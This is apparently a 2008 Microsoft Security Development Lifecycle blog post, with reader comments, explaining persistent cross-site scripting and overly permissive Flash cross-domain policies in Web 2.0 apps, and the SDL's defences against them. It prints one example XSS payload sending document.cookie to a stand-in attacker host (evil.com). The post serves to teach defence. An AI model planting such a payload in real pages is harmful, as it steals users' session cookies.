SDL and Web 2.0

SDL and Web 2.0

Rate This
  • Comments 4

 

Hi everyone, Bryan Sullivan here. 

Unless you’ve been living in an ice cave on the polar cap for the last month, you’ve heard about Microsoft’s proposed acquisition of Yahoo. George Hulme of InformationWeek wrote a very insightful column about the proposed acquisition and what it would mean for Yahoo’s Web 2.0 properties. My favorite quote from this column (probably my favorite quote from anyone’s column so far this year): “…there’s still much to do in the [software] industry to reach a level of truly sustainable computing. This is perhaps especially true in the nascent area of Web 2.0 development. Let’s hope Microsoft brings its Trustworthy Computing Initiative, or more precisely its Security Development Lifecycle to Yahoo, should the $45 billion deal come through.” That’s pretty high praise for the SDL, but what exactly does the SDL have to say about Web 2.0 development? To answer this question, let’s take a look at a couple of security issues that affect Web 2.0 applications and then dive into the corresponding SDL requirements.

Many Web 2.0 applications allow their end users to build and contribute to the application. Think about social networking sites like Facebook, or wikis like Wikipedia. The content on sites like these comes directly from the users themselves. (Remember that you were Time Magazine’s Person of the Year in 2006 for this very reason!) While this is very empowering for users, it does beg the question: If users can add their own content to a web site, what’s to prevent them from adding malicious content? Consider what would happen if Evil Eve adds the following HTML to a wiki entry:

<img src=“http://www.evil.com/eve?“ + document.cookie/>

If the wiki accepts this content from Eve, then anyone who looks at the wiki entry will have their browser cookie “stolen” and sent to Eve at evil.com. The cookie could potentially contain login credentials or other sensitive information, allowing Eve to impersonate her victim and essentially commit a form of identity theft.

The attack I’ve shown here is known as a persistent Cross-Site Scripting (XSS) attack, and is the most dangerous form of XSS since it doesn’t require any social engineering like reflective and DOM-based XSS attacks do. The victim doesn’t have to do anything unusual – he just has to browse to an infected page, maybe even one he’s been to hundreds of times in the past. And in all likelihood, he’ll never even know he was a victim. The Samy worm which infected MySpace in late 2005 exploited a persistent XSS vulnerability to silently spread through its victims’ profile pages. Within less than a day after its release, Samy had spread to over one million MySpace users, forcing MySpace to completely shut down its site while they diagnosed and fixed the vulnerability.

 (As a side note, I’d like to point out that if the developers of the hypothetical wiki in the earlier example had used the HttpOnly attribute for their site cookies, Evil Eve would not have been able to steal those cookies. However, HttpOnly is just a defense-in-depth measure and not a complete solution for the inherent problem of end users being able to write malicious code into the web site.)

Web mashups are another popular component of Web 2.0. JavaScript’s Same Origin Policy prevents web developers from writing client-based mashups (that is, mashups that don’t use a server proxy to request data from the individual sites being “mashed” together) in straight DHTML. Some Rich Internet Application (RIA) frameworks, notably Adobe’s Flash and Microsoft’s Silverlight, offer mechanisms to bypass the Same Origin Policy. For Flash, this mechanism is an XML file (crossdomain.xml) hosted on the domain root that lists all the external domains that should be granted access to the Flash movie. For example, if you host a Flash movie at www.mysite.com, and want to allow access from www.friendlysite.com, you would create a file www.mysite.com/crossdomain.xml with content as follows:

<cross-domain-policy>

   <allow-access-from domain=”www.friendlysite.com”/>

</cross-domain-policy>

 

So far, so good. However, crossdomain.xml allows not just specific domain names in the allow-access-from element (ie “www.friendlysite.com”) but also wildcards (“*.friendlysite.com”). In fact, it will even allow wildcards that break the two-dots rule like “*.com” or even just “*”. By using highly permissive access lists like this, a developer is essentially letting anyone on the internet manipulate his objects and data. In an attack very reminiscent of the Samy worm, Chris Shiflett exploited an allow-access-from-* entry in Flickr’s crossdomain.xml file that caused any visitor to Chris’s web site to automatically add Chris to their Flickr friends list. While this may not be the scariest attack you’ve ever heard of, imagine what might happen if a truly malicious user discovers the same vulnerability in the fund transfer functionality of a bank’s web site, or the security trading functionality of a brokerage firm’s web site.

So, what does the SDL have to say about these issues? In terms of XSS prevention, the SDL offers a lot of guidance. The SDL requires the use of both input validation (making sure that user input conforms to a known good format – in the case of the wiki entry, to deny HTML and script content) and output encoding (making sure that any active content that gets past the input validation routines is rendered as harmless text and not executed). Internally, we also mandate the use of code analysis tools to find XSS vulnerabilities that might otherwise slip through the cracks. This is great advice for anyone developing web applications, whether they’re Web 2.0 or 1.0.

As for cross-domain policy files, the SDL provides several recommendations. First is a simple attack surface reduction: if a site is not meant to be accessed by foreign domains, then any cross-domain policy files should be removed from the site. Second, if an application offers cross-domain access and also has functionality available only to authenticated users, then this site must not contain overly permissive access lists like “*” or “*.com”. It’s best to list specific domains wherever possible, or at least follow the same two-dots rule that HTTP cookies have to follow for their domain specifications. This helps to limit the sites that can perform request forgery attacks like the Flickr attack mentioned earlier. If no applications anywhere on the site offer special functionality for authenticated users, then the SDL does permit the site to have a broad-reaching cross-domain access list. However, this does require constant oversight to ensure that no authenticated applications are added to the site at a later time. In my opinion, it’s safer just to lock down the list to exactly the sites that are necessary and no more.

Regardless of what happens between Microsoft and Yahoo, I agree with George that adoption of the SDL would benefit Yahoo’s Web 2.0 applications. In fact, I’ll take it a step further and state that adoption of the SDL would benefit anyone’s Web 2.0 applications. In my next SDL blog post, I’ll be addressing the trickiest aspect of implementing the SDL for Web 2.0: developing the “perpetual beta”.

Comments
  • PingBack from http://www.biosensorab.org/2008/02/28/sdl-and-web-20/

  • "As a side note, I’d like to point out that if the developers of the hypothetical wiki in the earlier example had used the HttpOnly attribute for their site cookies, Evil Eve would not have been able to steal those cookies."

    I am by no means advocating developers not use HttpOnly, it should always be set, but it should not be praised as a bulletproof method for keeping javascript from stealing the cookie (lest developers get cocky and make dumb decisions thinking their cookie is now safe).   There is a method using XMLHttpRequest to read the cookie despite this protection.  

    However, as there isn't a simple fix in light of that, I think the problem demonstrates why a thorough SDL would be of optimal use here; it would identify that risk and prescribe further effort to secure against that vector of attack.

    I look forward to the next article.  

  • a {color : #0033CC;} a:link {color: #0033CC;} a:visited.local {color: #0033CC;} a:visited {color : #800080;}

  • Hi… I found this nice blog entry http://blogs.msdn.com/sdl/archive/2008/02/28/sdl-and-web-2-0.aspx Every

Page 1 of 1 (4 items)
Leave a Comment
  • Please add 1 and 3 and type the answer here:
  • Post